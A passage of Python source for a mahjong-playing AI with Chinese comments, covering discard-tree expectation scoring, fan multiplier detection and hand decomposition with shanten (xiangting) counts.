node.jiang])\n self.discard_state[card][2].append([value, fan_list])\n self.discard_state[card][-1].append(score)\n # elif time.time() - TIME_START < 2.3: # 时间处理3\n else:\n index = self.discard_state[card][0].index(taking_set_sorted)\n if score > self.discard_state[card][-1][index]:\n self.chang_num += 1\n self.discard_state[card][1][index] = ([node.AAA, node.ABC, node.jiang])\n self.discard_state[card][2][index] = ([value, fan_list])\n self.discard_state[card][-1][index] = score\n\n elif node.children != []:\n for child in node.children:\n self.calculate_path_expectation(node=child)\n\n def calculate_path_expectation2(self, node, discard):\n # node.node_info()\n # print value\n # value_ = value\n # print node.AAA,node.ABC,node.jiang\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n node.AAA.sort()\n node.ABC.sort()\n # print \"that way\"\n # 去除宝牌补的0,最后的将牌补的0保留\n if self.king_num != 0:\n while 0 in node.taking_set[:-1]:\n node.taking_set[:-1].remove(0)\n node.taking_set[:-1].sort()\n # if node.taking_set[-1] != 0: # 非宝吊, 宝吊给1\n # value\n # node.value = T_SELFMO[MJ.convert_hex2index(node.take)]\n # 计算胡牌概率\n value = 1\n if node.take == -1:\n # print node.taking_set_w\n node.taking_set_w[-1] = 1\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n if card != 0:\n # print node.taking_set_w, i, node.taking_set\n value *= T_SELFMO[MJ.convert_hex2index(card)] * node.taking_set_w[i]\n\n # 摸牌概率修正,当一张牌被重复获取时,T_selfmo修改为当前数量占未出现牌数量的比例\n taking_set = list(set(node.taking_set))\n taking_set_num = [taking_set.count(i) for i in taking_set]\n # value *= node.value\n for i in range(len(taking_set_num)):\n # print \"aaa\"\n # print taking_set,taking_set_num\n n = taking_set_num[i]\n index = MJ.convert_hex2index(taking_set[i])\n\n while n > 1:\n if LEFT_NUM[index] >= n:\n value *= (LEFT_NUM[index] - n + 1) / (LEFT_NUM[index] - n + 2)\n else:\n value = 0\n n -= 1\n # print node.baohuanyuan\n # if node.baohuanyuan:\n # print \"node_info...\"\n # node.node_info()\n fan = Fan(kz=node.AAA, sz=node.ABC, jiang=node.jiang, fei_king=node.fei_king, king_num=node.king_num,\n baohuanyuan=node.baohuanyuan).fanDetect()\n # print fan.baohuanyuan\n score = fan * value\n # print t2tot3_dict[str([37,37])],T_SELFMO[MJ.convert_hex2index(37)]\n\n # 去重处理,当状态相同时,只考虑最后一张牌不同时对评估造成的影响,也就是最后摸到的牌其获取途径将会不同。\n # 此外,在进行评估时,还要考虑\n\n state = []\n state.append([node.AAA, node.ABC, node.jiang]) #\n state.append(node.taking_set)\n # print state, node.value,score,fan,node.baohuanyuan,node.fei_king\n # print state\n # state.append(node.score)\n # state = [node.AAA, node.ABC, node.jiang]\n # if state == [[[[1, 1, 1], [1, 1, 1], [37, 37, 37]], [[2, 3, 4]], [0, 0]], [37]]:\n # print node.value, value_\n if state not in self.discard_state[discard][0]:\n self.discard_state[discard][0].append(state)\n # self.discard_state[discard][1].append(node.taking_set)\n self.discard_state[discard][1].append(score)\n # else:\n # index = self.discard_state[discard][0].index(state)\n # if node.take not in self.discard_state[discard][1][index]:\n # self.discard_state[discard][1][index].append(node.taking_set)\n # self.discard_state[discard][1][index].append(score)\n # self.discard_score[discard].append(state)\n elif node.children != []:\n for child in node.children:\n # value_ = value\n # if node.take == 0:\n\n # if child.take==0:\n\n # if child.take == -1 and (self.king_num == 0 or node.baohuanyuan):\n # if type(node.take) == list:\n # # print node.node_info()\n # index1 = MJ.convert_hex2index(node.take[0])\n # index2 = MJ.convert_hex2index(node.take[1])\n # value_ *= T_SELFMO[index1] * T_SELFMO[index2]\n # else:\n # node.node_info()\n # value_ *= T_SELFMO[MJ.convert_hex2index(node.take)]\n #\n # else:\n # value_ *= node.value\n\n self.calculate_path_expectation(node=child, discard=discard)\n\n def get_discard_score(self):\n t1 = time.time()\n self.generate_tree()\n t2 = time.time()\n for root in self.tree_dict:\n # if discard not in self.discard_score.keys():\n # self.discard_score[discard] = 0\n # if discard not in self.discard_state.keys():\n # if discard not in self.discard_state.keys():\n # self.discard_state[discard] = [[], []]\n # for root in self.tree_dict[discard]:\n self.calculate_path_expectation(root)\n t3 = time.time()\n # print(\"tree time:\", t2 - t1, \"value time:\", t3 - t2)\n state_num = 0\n for discard in self.discard_state.keys():\n if discard not in self.discard_score.keys():\n self.discard_score[discard] = 0\n # for score_list in self.discard_state[discard][1]:\n self.discard_score[discard] = sum(self.discard_state[discard][-1])\n state_num += len(self.discard_state[discard][-1])\n\n # print (\"discard_state\", self.discard_state)\n # print (\"discard_score\", self.discard_score)\n # print (\"leaf node \", self.node_num)\n # print (\"state_num\", state_num)\n # print (\"chang_num\", self.chang_num)\n return self.discard_score, self.discard_state\n\n\n'''\n番数计算类\n'''\n\n\nclass Fan():\n def __init__(self, kz, sz, jiang, fei_king=0, using_king=0, baohuanyuan=False):\n \"\"\"\n 初始化类变量\n :param kz: 刻子\n :param sz: 顺子\n :param jiang: 将\n :param node: 待检测的结点\n :param fei_king: 飞宝数\n \"\"\"\n self.kz = kz\n self.sz = sz\n self.jiang = jiang\n self.fei_king = fei_king\n self.using_king = using_king\n self.baohuanyuan = baohuanyuan\n self.mul = 2\n\n # 碰碰胡\n def pengPengHu(self):\n \"\"\"\n 碰碰胡检测\n 是否刻子树数达到4个\n :return: bool\n \"\"\"\n if len(self.kz) == 4:\n # if self.usingKing==0:\n return True\n else:\n return False\n\n # 宝还原 x2\n # def baoHuanYuan(self):\n #\n # if self.baohuanyuan:\n # return True\n # else:\n # return False\n\n # 清一色 x2\n def qingYiSe(self):\n \"\"\"\n 清一色检测\n 手牌为同一花色\n :return: bool\n \"\"\"\n # todo 宝吊无法检测清一色,因为将牌无法确定\n w = 0\n ti = 0\n to = 0\n z = 0\n # print self.kz + self.sz+ self.jiang\n for t in self.kz + self.sz + [self.jiang]:\n card = t[0]\n if card != 0:\n if card & 0xf0 == 0x00:\n w = 1\n elif card & 0xf0 == 0x10:\n ti = 1\n elif card & 0xf0 == 0x20:\n to = 1\n else:\n return False\n\n if w + ti + to <= 1:\n return True\n else:\n return False\n\n def fanDetect(self):\n \"\"\"\n 番数计算\n 基础分4分,通过调用上述的番种检测来增加基础分\n :return: int 番数\n \"\"\"\n fan_list = [0, 0, 0, 0, 0, 0, 0] # 碰碰胡,清一色,宝还原,宝吊1234\n # 基础分判定\n score = 4\n if self.pengPengHu():\n # print \"0\"\n score *= self.mul\n fan_list[0] = 1\n if self.using_king == 0 or self.baohuanyuan:\n score *= self.mul\n\n # score *= 2 # 碰碰胡再给2倍分\n\n # 翻倍机制\n # 飞宝 当可以宝吊时,将飞宝倍数得到提高\n # if 0 in self.jiang:\n # for i in range(self.fei_king):\n # score *= 2.5\n # else:\n if self.fei_king > 0:\n fan_list[2 + self.fei_king] = 1\n for i in range(self.fei_king):\n # print \"1\"\n\n score *= self.mul\n\n # # 宝还原 x2\n if self.baohuanyuan:\n # print score, self.baohuanyuan,self.jiang,\n # print \"2\"\n score *= self.mul\n fan_list[2] = 1\n\n # 清一色\n if self.qingYiSe():\n score *= self.mul\n fan_list[1] = 1\n # print \"3\"\n # 单吊 x2\n # 这里无法处理,宝吊需要吃碰杠吃碰杠处理\n # if score>16: #得分大于16时,分数评估提高\n # score*=1.5\n # print\n return score, fan_list\n\n\nclass Fan2():\n def __init__(self, kz, sz, jiang, node=None, fei_king=0, kingNum=0):\n \"\"\"\n 初始化类变量\n :param kz: 刻子\n :param sz: 顺子\n :param jiang: 将\n :param node: 待检测的结点\n :param fei_king: 飞宝数\n \"\"\"\n self.kz = kz\n self.sz = sz\n self.jiang = jiang\n self.baoHuanYuan = False\n self.noKing = True\n\n # self.usingKing=node.usingKing\n if node != None:\n self.feiKingNum = node.feiKingNum\n if node.baoHuanYuan + node.feiKingNum == kingNum:\n # self.NoKing=True\n if kingNum != 0 and node.baoHuanYuan != 0:\n self.baoHuanYuan = True\n else:\n self.noKing = False\n\n\n else:\n self.feiKingNum = fei_king\n\n # 碰碰胡\n def pengPengHu(self):\n \"\"\"\n 碰碰胡检测\n 是否刻子树数达到4个\n :return: bool\n \"\"\"\n if len(self.kz) == 4:\n # if self.usingKing==0:\n return True\n else:\n return False\n\n # 宝还原 x2\n # def baoHuanYuan(self):\n #\n # if self.baoHuanYuan:\n # return True\n # else:\n # return False\n\n # 清一色 x2\n def qingYiSe(self):\n \"\"\"\n 清一色检测\n 手牌为同一花色\n :return: bool\n \"\"\"\n cards = copy.copy(self.kz + self.sz)\n cards.append(self.jiang)\n w = 0\n ti = 0\n to = 0\n z = 0\n for card in cards:\n if card & 0xf0 == 0x00:\n w = 1\n elif card & 0xf0 == 0x10:\n ti = 1\n elif card & 0xf0 == 0x20:\n to = 2\n else:\n return False\n\n if w + ti + to + z <= 1:\n return True\n else:\n return False\n\n def fanDetect(self):\n \"\"\"\n 番数计算\n 基础分4分,通过调用上述的番种检测来增加基础分\n :return: int 番数\n \"\"\"\n # 基础分判定\n score = 4\n if self.pengPengHu():\n\n score = 8\n if self.noKing:\n score = 16\n\n # 翻倍机制\n # 飞宝\n for i in range(self.feiKingNum):\n score *= 2\n # # 宝还原 x2\n if self.baoHuanYuan:\n score *= 2\n # 单吊 x2\n # 这里无法处理,宝吊需要吃碰杠吃碰杠处理\n\n return score\n\n\n'''\n平胡类,相关处理方法\n分为手牌拆分模块sys_info,评估cost,出牌决策,吃碰杠决策等部分\n'''\n\n\nclass pinghu:\n '''\n '''\n\n def __init__(self, cards, suits, leftNum=[], discards=[], discards_real=[], discardsOp=[], round=0, remainNum=134,\n seat_id=0, kingCard=None, fei_king=0, op_card=0x00):\n \"\"\"\n 类变量初始化\n :param cards: 手牌 \n :param suits:副露\n :param leftNum:剩余牌数量列表\n :param discards:弃牌\n :param discards_real:实际弃牌\n :param discardsOp:场面副露\n :param round:轮数\n :param remainNum:牌墙剩余牌数量\n :param seat_id:座位号\n :param kingCard:宝牌\n :param fei_king:飞宝数\n :param op_card:动作操作牌\n \"\"\"\n cards.sort()\n self.cards = cards\n self.suits = suits\n self.discards = discards\n self.discards_real = discards_real\n self.discardsOp = discardsOp\n self.remainNum = remainNum\n self.leftNum = leftNum\n self.round = round\n self.seat_id = seat_id\n self.fei_king = fei_king\n # print ('self.leftNum',self.leftNum)\n if self.leftNum == []:\n leftNum, discardsList = trandfer_discards(discards, discardsOp, cards)\n self.leftNum = leftNum\n\n # self.fengWei = fengWei\n self.kingCard = kingCard\n self.preKingCard = pre_king(kingCard)\n self.op_card = op_card\n if kingCard != None:\n self.kingNum = cards.count(kingCard)\n else:\n self.kingNum = 0 # print('kingNum111',leftNum[convert_hex2index(self.kingCard)],self.cards)\n\n @staticmethod\n def get_effective_cards(dz_set=[]):\n \"\"\"\n 获取有效牌\n :param dz_set: 搭子集合 list [[]]\n :return: 有效牌 list []\n \"\"\"\n effective_cards = []\n for dz in dz_set:\n if len(dz) == 1:\n effective_cards.append(dz[0])\n elif dz[1] == dz[0]:\n effective_cards.append(dz[0])\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n effective_cards = set(effective_cards) # set 和list的区别?\n return list(effective_cards)\n\n def get_effective_cards_w(self, dz_set=[], left_num=[]):\n \"\"\"\n 有效牌及其概率获取\n :param dz_set: 搭子集合 list[[]],剩余牌 []\n :param left_num: 有效牌集合[], 有效牌概率 []\n :return:\n \"\"\"\n cards_num = self.remainNum\n effective_cards = []\n w = []\n for dz in dz_set:\n if dz[1] == dz[0]:\n effective_cards.append(dz[0])\n # if dz[0]>=0x31 and dz[0]<=0x37 and left_num[translate16_33(dz[0])]>0:#添加字牌权重\n # w.append(float((left_num[translate16_33(dz[0])]+0.5) * w_aa) / cards_num)\n # else:\n w.append(float(\n left_num[translate16_33(dz[0])]) / cards_num * w_aa) # 修改缩进,发现致命错误panic 忘了写float,这里写6是因为评估函数计算的缺陷\n\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] + 2)]) / cards_num * w_ab)\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append((dz[0] - 1))\n w.append(float(left_num[translate16_33(dz[0] - 1)]) / cards_num * w_ab)\n else:\n effective_cards.append(dz[0] - 1)\n effective_cards.append(dz[0] + 2)\n w.append(float(left_num[translate16_33(dz[0] - 1)] + left_num[\n translate16_33(dz[0] + 2)]) / cards_num * w_ab)\n elif dz[1] == dz[0] + 2:\n effective_cards.append(dz[0] + 1)\n w.append(float(left_num[translate16_33(int(dz[0]) + 1)]) / cards_num * w_ab)\n return effective_cards, w\n\n @staticmethod\n def split_type_s(cards=[]):\n \"\"\"\n 功能:手牌花色分离,将手牌分离成万条筒字各色后输出\n :param cards: 手牌 []\n :return: 万,条,筒,字 [],[],[],[]\n \"\"\"\n cards_wan = []\n cards_tiao = []\n cards_tong = []\n cards_zi = []\n for card in cards:\n if card & 0xF0 == 0x00:\n cards_wan.append(card)\n elif card & 0xF0 == 0x10:\n cards_tiao.append(card)\n elif card & 0xF0 == 0x20:\n cards_tong.append(card)\n elif card & 0xF0 == 0x30:\n cards_zi.append(card)\n return cards_wan, cards_tiao, cards_tong, cards_zi\n\n @staticmethod\n def get_32N(cards=[]):\n \"\"\"\n 功能:计算所有存在的手牌的3N与2N的集合,例如[3,4,5] ,将得到[[3,4],[3,5],[4,5],[3,4,5]]\n 思路:为减少计算量,对长度在12张以上的单花色的手牌,当存在顺子时,不再计算搭子\n :param cards: 手牌 []\n :return: 3N与2N的集合 [[]]\n \"\"\"\n cards.sort()\n kz = []\n sz = []\n aa = []\n ab = []\n ac = []\n lastCard = 0\n # 对长度在12张以上的单花色的手牌,当存在顺子时,不再计算搭子\n if len(cards) >= 12:\n for card in cards:\n if card == lastCard:\n continue\n else:\n lastCard = card\n if cards.count(card) >= 3:\n kz.append([card, card, card])\n elif cards.count(card) >= 2:\n aa.append([card, card])\n if card + 1 in cards and card + 2 in cards:\n sz.append([card, card + 1, card + 2])\n else:\n if card + 1 in cards:\n ab.append([card, card + 1])\n if card + 2 in cards:\n ac.append([card, card + 2])\n else:\n for card in cards:\n if card == lastCard:\n continue\n else:\n lastCard = card\n if cards.count(card) >= 3:\n kz.append([card, card, card])\n if cards.count(card) >= 2:\n aa.append([card, card])\n if card + 1 in cards and card + 2 in cards:\n sz.append([card, card + 1, card + 2])\n if card + 1 in cards:\n ab.append([card, card + 1])\n if card + 2 in cards:\n ac.append([card, card + 2])\n return kz + sz + aa + ab + ac\n\n # 判断32N是否存在于cards中\n @staticmethod\n def in_cards(t32=[], cards=[]):\n \"\"\"\n 判断32N是否存在于cards中\n :param t32: 3N或2N组合牌\n :param cards: 本次判断的手牌\n :return: bool\n \"\"\"\n for card in t32:\n if card not in cards:\n return False\n return True\n\n def extract_32N(self, cards=[], t32_branch=[], t32_set=[]):\n \"\"\"\n 功能:递归计算手牌的所有组合信息,并存储在t32_set,\n 思路: 每次递归前检测是否仍然存在32N的集合,如果没有则返回出本此计算的结果,否则在手牌中抽取该32N,再次进行递归\n :param cards: 手牌\n :param t32_branch: 本次递归的暂存结果\n :param t32_set: 所有组合信息\n :return: 结果存在t32_set中\n \"\"\"\n t32N = self.get_32N(cards=cards)\n\n if len(t32N) == 0:\n t32_set.extend(t32_branch)\n # t32_set.extend([cards])\n t32_set.append(0)\n t32_set.extend([cards])\n else:\n for t32 in t32N:\n if self.in_cards(t32=t32, cards=cards):\n cards_r = copy.copy(cards)\n for card in t32:\n cards_r.remove(card)\n t32_branch.append(t32)\n self.extract_32N(cards=cards_r, t32_branch=t32_branch, t32_set=t32_set)\n if len(t32_branch) >= 1:\n t32_branch.pop(-1)\n\n def tree_expand(self, cards):\n \"\"\"\n 功能:对extract_32N计算的结果进行处理同一格式,计算万条筒花色的组合信息\n 思路:对t32_set的组合信息进行格式统一,分为[kz,sz,aa,ab,xts,leftCards]保存,并对划分不合理的地方进行过滤,例如将345划分为35,4为废牌的情况\n :param cards: cards [] 万条筒其中一种花色手牌\n :return: allDeWeight [kz,sz,aa,ab,xts,leftCards] 去除不合理划分情况的组合后的组合信息\n \"\"\"\n all = []\n t32_set = []\n self.extract_32N(cards=cards, t32_branch=[], t32_set=t32_set)\n kz = []\n sz = []\n t2N = []\n aa = []\n length_t32_set = len(t32_set)\n i = 0\n # for i in range(len(t32_set)):\n while i < length_t32_set:\n t = t32_set[i]\n flag = True # 本次划分是否合理\n if t != 0:\n if len(t) == 3:\n\n if t[0] == t[1]:\n kz.append(t)\n else:\n sz.append(t) # print (sub)\n elif len(t) == 2:\n if t[1] == t[0]:\n aa.append(t)\n else:\n t2N.append(t)\n\n else:\n '修改,使计算时间缩短'\n leftCards = t32_set[i + 1]\n efc_cards = self.get_effective_cards(dz_set=t2N) # t2N中不包含aa\n # 去除划分不合理的情况,例如345 划分为34 或35等,对于333 划分为33 和3的情况,考虑有将牌的情况暂时不做处理\n for card in leftCards:\n if card in efc_cards:\n flag = False\n break\n\n if flag:\n all.append([kz, sz, aa, t2N, 0, leftCards])\n kz = []\n sz = []\n aa = []\n t2N = []\n i += 1\n i += 1\n\n allSort = [] # 给每一个元素排序\n allDeWeight = [] # 排序去重后\n\n for e in all:\n for f in e:\n if f == 0: # 0是xts位,int不能排序\n continue\n else:\n f.sort()\n allSort.append(e)\n\n for a in allSort:\n if a not in allDeWeight:\n allDeWeight.append(a)\n\n allDeWeight = sorted(allDeWeight, key=lambda k: (len(k[0]), len(k[1]), len(k[2])), reverse=True) # 居然可以这样排序!!\n return allDeWeight\n\n @staticmethod\n def zi_expand(cards=[]):\n \"\"\"\n 功能:计算字牌组合信息\n 思路:字牌组合信息需要单独计算,因为没有字顺子,迭代计算出各张字牌的2N和3N的情况,由于某些情况下,可能只会需要aa作为将牌的情况,同时需要刻子和aa的划分结果\n :param cards: 字牌手牌\n :return: ziBranch 字牌的划分情况 [kz,sz,aa,ab,xts,leftCards]\n \"\"\"\n cardList = []\n for i in range(7):\n cardList.append([])\n ziCards = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n for card in ziCards:\n index = (card & 0x0f) - 1\n # print(index)\n\n if cards.count(card) == 4:\n # 此结构为[3N,2N,leftCards]\n cardList[index].append([[[card, card, card]], [], [], [], 0, [card]])\n elif cards.count(card) == 3:\n cardList[index].append([[[card, card, card]], [], [], [], 0, []])\n cardList[index].append([[], [], [[card, card]], [], 0, [card]])\n elif cards.count(card) == 2:\n\n cardList[index].append([[], [], [[card, card]], [], 0, []])\n elif cards.count(card) == 1:\n cardList[index].append([[], [], [], [], 0, [card]])\n else:\n cardList[index].append([[], [], [], [], 0, []])\n\n ziBranch = []\n for c1 in cardList[0]:\n for c2 in cardList[1]:\n for c3 in cardList[2]:\n for c4 in cardList[3]:\n for c5 in cardList[4]:\n for c6 in cardList[5]:\n for c7 in cardList[6]:\n branch = []\n for n in range(6):\n branch.append(c1[n] + c2[n] + c3[n] + c4[n] + c5[n] + c6[n] + c7[n])\n ziBranch.append(branch)\n return ziBranch\n\n def pengpengHu(self, outKingCards, suits, kingNum):\n \"\"\"\n 功能:碰碰胡检测\n 思路:计算碰碰胡的组合情况,只考虑kz和aa,当副露中存在sz时,返回[[],[],[],[],14,[]],其中xts为14表示不可能胡碰碰胡\n :param outKingCards: 去除宝牌后的手牌\n :param suits: 副露\n :param kingNum: 宝数量\n :return: all_PengPengHu 碰碰胡的组合情况\n \"\"\"\n all_PengPengHu = [[], [], [], [], 14, []]\n\n for suit in suits:\n if suit[0] != suit[1]:\n return []\n\n for card in set(outKingCards):\n\n if outKingCards.count(card) == 1:\n all_PengPengHu[-1].append(card)\n elif outKingCards.count(card) == 2:\n all_PengPengHu[2].append([card, card])\n elif outKingCards.count(card) == 3:\n all_PengPengHu[0].append([card, card, card])\n elif outKingCards.count(card) == 4:\n all_PengPengHu[0].append([card, card, card])\n all_PengPengHu[-1].append(card)\n all_PengPengHu = self.xts([all_PengPengHu], suits, kingNum)\n return all_PengPengHu\n\n @staticmethod\n def xts(all=[], suits=[], kingNum=0):\n \"\"\"\n 功能:计算组合的向听数\n 思路:初始向听数为14,减去相应已成型的组合(kz,sz为3,aa/ab为2,宝直接当1减去),当2N过剩时,只减去还需要的2N,对2N不足时,对还缺少的3N减去1,表示从孤张牌中选择一张作为3N的待选\n :param all: [[]]组合信息\n :param suits: 副露\n :param kingNum: 宝牌数量\n :return: all 计算向听数后的组合信息\n \"\"\"\n for i in range(len(all)):\n t3N = all[i][0] + all[i][1]\n all[i][4] = 14 - (len(t3N) + len(suits)) * 3\n # 有将牌\n has_aa = False\n if len(all[i][2]) > 0:\n has_aa = True\n\n if has_aa and kingNum == 0: # has do 当2N与3N数量小于4时,存在没有减去相应待填数,即废牌也会有1张作为2N或3N的待选位,\n # print()all_src\n if len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) - 1 >= 4:\n\n all[i][4] -= (4 - (len(suits) + len(t3N))) * 2 + 2\n else:\n all[i][4] -= (len(all[i][2]) + len(all[i][3]) - 1) * 2 + 2 + 4 - (\n len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) - 1) # 0717 17:24\n # 无将牌\n else:\n if len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]) >= 4:\n\n all[i][4] -= (4 - (len(suits) + len(t3N))) * 2 + 1\n\n else:\n all[i][4] -= (len(all[i][2]) + len(all[i][3])) * 2 + 1 + 4 - (\n len(suits) + len(t3N) + len(all[i][2]) + len(all[i][3]))\n all[i][4] -= kingNum\n if all[i][4] < 0:\n all[i][4] = 0\n all.sort(key=lambda k: (k[4], len(k[-1])))\n return all\n\n @staticmethod\n def is_related(card=[], ndCards=[]):\n \"\"\"\n 功能:判断孤张牌是否与次级废牌能成为搭子2N关系\n 思路:先计算该张废牌的相关牌为临近2张牌,判断其是否在次级废牌中ndCards\n :param card: 废牌\n :param ndCards: 次级废牌组合\n :return: bool\n \"\"\"\n if card > 0x30:\n return False\n relatedSet = [card - 2, card - 1, card, card + 1, card + 2]\n for card in relatedSet:\n if card in ndCards:\n return True\n return False\n\n def sys_info_V3(self, cards, suits, left_num=[4] * 34, kingCard=None):\n \"\"\"\n 功能:综合计算手牌的组合信息\n 思路:对手牌进行花色分离后,单独计算出每种花色的组合信息 ,再将其综合起来,计算每个组合向听数,最后输出最小向听数及其加一的组合\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param kingCard: 宝牌\n :return: 组合信息\n \"\"\"\n # 去除宝牌计算信息,后面出牌和动作决策再单独考虑宝牌信息\n if kingCard == None:\n kingCard = self.kingCard\n RM_King = copy.copy(cards)\n kingNum = 0\n if kingCard != None:\n kingNum = cards.count(kingCard)\n for i in range(kingNum):\n RM_King.remove(kingCard)\n\n # 特例,op操作计算胡牌概率时使用,在处理op_card是宝牌时,该宝牌只能作为宝还原使用\n if 0 not in cards and self.op_card == self.kingCard and len(cards) % 3 == 2:\n RM_King.append(self.kingCard)\n RM_King.sort()\n kingNum -= 1\n\n # 花色分离\n wan, tiao, tong, zi = self.split_type_s(RM_King)\n wan_expd = self.tree_expand(cards=wan)\n tiao_expd = self.tree_expand(cards=tiao)\n tong_expd = self.tree_expand(cards=tong)\n zi_expd = self.zi_expand(cards=zi)\n\n all = []\n for i in wan_expd:\n for j in tiao_expd:\n for k in tong_expd:\n for m in zi_expd:\n branch = []\n # 将每种花色的4个字段合并成一个字段\n for n in range(6):\n branch.append(i[n] + j[n] + k[n] + m[n])\n all.append(branch)\n\n # 将获取概率为0的组合直接丢弃到废牌中 todo 由于有宝,这里也可能会被宝代替\n # 移到了出牌决策部分处理\n # if len(cards) % 3 == 1 and self.kingNum <= 1:#这里只考虑出牌、宝做宝吊的情况\n # for a in all:\n # for i in range(len(a[3]) - 1, -1, -1):\n # ab = a[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) == 0:\n # a[3].remove(ab)\n # a[-1].extend(ab)\n # logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\",self.cards,self.suits,self.kingCard,a)\n\n # 对废牌区的牌都是与aa/ab区相联系时,将价值最低的ab丢弃到废牌区\n # for a in all:\n # ndCards = []\n # for aa_ab in a[2] + a[3]:\n # ndCards.extend(aa_ab)\n # Flag = True\n # for card in a[-1]:\n # if not self.is_related(card, ndCards):\n # Flag = False\n # break\n # if Flag:\n # # print ('all are related',a[3])\n #\n # for i in range(len(a[3]) - 1, -1, -1):\n # ab = a[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([left_num[convert_hex2index(e)] for e in efc]) <= 2:\n # a[3].remove(ab)\n # a[-1].extend(ab)\n\n # 计算向听数\n # 计算拆���组合的向听数\n all = self.xts(all, suits, kingNum)\n\n # 获取向听数最小的all分支\n min_index = 0\n for i in range(len(all)):\n if all[i][4] > all[0][4] + 1: # xts+1以下的组合\n min_index = i\n break\n\n if min_index == 0: # 如果全部都匹配,则min_index没有被赋值,将min_index赋予all长度\n min_index = len(all)\n\n all = all[:min_index]\n # print(\"all_terminal\", all)\n return all\n\n def left_card_weight_bak(self, card, left_num):\n \"\"\"\n 功能:对废牌组合中的每张废牌进行评估,计算其成为3N的概率\n 思路:每张牌能成为3N的情况可以分为先成为搭子,在成为3N2步,成为搭子的牌必须自己摸到,而成为kz,sz可以通过吃碰。刻子为获取2张相同的牌,顺子为其邻近的2张牌\n :param card: 孤张牌\n :param left_num: 剩余牌\n :return: 评估值\n \"\"\"\n if self.remainNum == 0:\n remainNum = 1\n else:\n remainNum = self.remainNum\n # remainNum = 1\n i = convert_hex2index(card)\n # d_w = 0\n\n if left_num[i] == self.remainNum:\n sf = float(self.leftNum[i]) / remainNum * 6\n else:\n sf = float(left_num[i]) / remainNum * float((left_num[i] - 1)) / remainNum * 6\n if card >= 0x31: # kz概率\n # todo if card == fengwei:\n # if card >= 0x35 and left_num[i] >= 2:\n # d_w = left_num[i] * left_num[i] * 2 # bug 7.22 修正dw-d_w\n # else:\n d_w = sf # 7.22 16:35 去除字牌\n elif card % 16 == 1: # 11+23\n d_w = sf + float(left_num[i + 1]) / remainNum * float(left_num[i + 2]) / remainNum * 2\n elif card % 16 == 2: # 22+13+3(14)+43 222 123 234\n d_w = sf + float(left_num[i - 1]) / remainNum * float(left_num[i + 1]) / remainNum * 2 + float(\n left_num[i + 1]) / remainNum * float(left_num[\n i + 2]) / remainNum * 2 # d_w = left_num[i - 1] + left_num[i] * 3 + left_num[i + 1] * 2 + left_num[i + 2]\n elif card % 16 == 8: # 888 678 789\n d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[i - 1]) / remainNum * 2 + float(\n left_num[i - 1]) / remainNum * float(left_num[\n i + 1]) / remainNum * 2 # d_w = left_num[i - 2] + left_num[i - 1] * 2 + left_num[i] * 3 + left_num[i + 1]\n elif card % 16 == 9: # 999 789\n d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[\n i - 1]) / remainNum * 2 # d_w = left_num[i - 2] + left_num[i - 1] + left_num[i] * 3 # 删除多添加的×2\n else: # 555 345 456 567\n # print (left_num)\n d_w = sf + float(left_num[i - 2]) / remainNum * float(left_num[i - 1]) / remainNum * 2 + float(\n left_num[i - 1]) / remainNum * float(left_num[i + 1]) / remainNum * 2 + float(\n left_num[i + 1]) / remainNum * float(left_num[\n i + 2]) / remainNum * 2\n # print(\"i=\", i, d_w)\n return d_w\n\n def left_card_weight(self, card, left_num, need_jiang=False):\n \"\"\"\n 功能:对废牌组合中的每张废牌进行评估,计算其成为3N的概率\n 思路:每张牌能成为3N的情况可以分为先成为搭子,在成为3N2步,成为搭子的牌必须自己摸到,而成为kz,sz可以通过吃碰。刻子为获取2张相同的牌,顺子为其邻近的2张牌\n :param card: 孤张牌\n :param left_num: 剩余牌\n :return: 评估值\n \"\"\"\n\n # if self.remainNum==0:\n # remainNum=1\n # else:\n # remainNum = self.remainNum\n # remainNum = 1\n i = convert_hex2index(card)\n\n if need_jiang:\n return left_num[i]\n # d_w = 0\n\n # if left_num[i] == self.remainNum:\n # sf = float(self.leftNum[i])\n # else:\n # sf = float(left_num[i]) / remainNum * float((left_num[i] - 1)) / remainNum * 6\n\n if left_num[i] > 1:\n aa = left_num[i] * (left_num[i] - 1) * 4\n else:\n aa = left_num[i]\n if card >= 0x31: # kz概率\n # todo if card == fengwei:\n # if card >= 0x35 and left_num[i] >= 2:\n # d_w = left_num[i] * left_num[i] * 2 # bug 7.22 修正dw-d_w\n # else:\n d_w = aa # 7.22 16:35 去除字牌\n elif card % 16 == 1: # 11+23\n d_w = aa + left_num[i + 1] * left_num[i + 2] * 2\n elif card % 16 == 2: # 22+13+3(14)+43 222 123 234\n d_w = aa + left_num[i - 1] * left_num[i + 1] * 2 + left_num[i + 1] * left_num[i + 2] * 2\n elif card % 16 == 8: # 888 678 789\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2 + left_num[i - 1] * left_num[i + 1] * 2\n elif card % 16 == 9: # 999 789\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2\n # 删除多添加的×2\n else: # 555 345 456 567\n # print (left_num)\n d_w = aa + left_num[i - 2] * left_num[i - 1] * 2 + left_num[i - 1] * left_num[i + 1] * 2 + left_num[i + 1] * \\\n left_num[\n i + 2] * 2\n # if card<=0x31:\n # if (card%0x0f==3 or card %0x0f==7): #给金3银7倍数\n # d_w*=1.5\n # elif card%0x0f==5:\n # 